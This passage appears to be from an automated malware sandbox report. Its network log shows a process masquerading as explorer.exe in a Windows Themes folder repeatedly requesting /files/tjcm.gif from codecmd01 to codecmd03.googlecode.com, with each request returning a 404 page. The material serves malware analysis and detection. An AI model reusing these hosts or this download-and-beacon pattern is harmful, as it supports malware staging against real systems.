                                                                                                                                                          Jan 13, 2025 13:18:34.557703018 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:34.557894945 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:33 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:34.697926044 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          50192.168.2.45676064.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:35.233967066 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:35.960524082 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:35 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:35.960575104 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          51192.168.2.45677166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:36.395700932 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:37.109847069 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:37 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:37.109878063 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          52192.168.2.45678074.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:37.787712097 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:38.514292002 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:38 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:38.514338970 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          53192.168.2.45678764.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:38.889600039 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:39.591913939 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:39 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:39.591972113 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          54192.168.2.45679266.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:40.325479031 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:40.921633959 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:40 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:40.921678066 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          55192.168.2.45680274.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:41.281297922 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:41.978535891 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:41 GMT
